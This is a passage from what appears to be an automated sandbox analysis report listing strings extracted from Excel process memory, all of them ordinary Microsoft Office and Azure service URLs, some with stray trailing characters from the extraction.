Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizek
Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizem
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizen
Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizer
Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizes
Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizet
Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizeu
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizex
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorizez
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://login.windows.net/common/oauth2/authorize~
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1MBI_SSL_SHORT
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1T
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://management.azure.com
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://management.azure.com/
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://management.azure.com/d
Source: EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://messaging.office.com/
Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://metadata.templates.cdn.office.net/client/log9
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBearer
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://ncus.contentsync.
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://ncus.pagecontentsync.
Source: EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://nexus.officeapps.live.com
Source: EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp String found in binary or memory: https://nexus.officeapps.live.com/
Source: EXCEL.EXE, 00000001.00000003.565716216.0000000012AF8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289524102.0000000012AF8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.600038876.0000000012AF8000.00000004.00000001.sdmp String found in binary or memory: https://nexus.officeapps.live.com/nexus/
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://nexus.officeapps.live.com/nexus/rules
Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp String found in binary or memory: https://nexus.officeapps.live.com/nexus/rules?Application=excel
Source: EXCEL.EXE, 00000001.00000003.289495071.0000000012AA6000.00000004.00000001.sdmp String found in binary or memory: https://nexus.officeapps.live.com/nexus/rules?Application=excel.exe&Version=16.0.4954.1000&ClientId=
Source: EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp String found in binary or memory: https://nexus.officeapps.live.com6
Source: EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp String found in binary or memory: https://nexus.officeapps.live.com~
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecordhttps://login.windows.net/co
Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp String found in binary or memory: https://o365auditrealtimeingestion.manage.office.comBearer
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620001254.000000000F47D000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.dr String found in binary or memory: https://officeapps.live.com
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.com&
Source: EXCEL.EXE, 00000001.00000002.753233650.000000000F2D0000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.com0bOi
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comD
Source: EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comId(
Source: EXCEL.EXE, 00000001.00000003.620001254.000000000F47D000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comN
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comP
Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp String found in binary or memory: https://officeapps.live.comZ
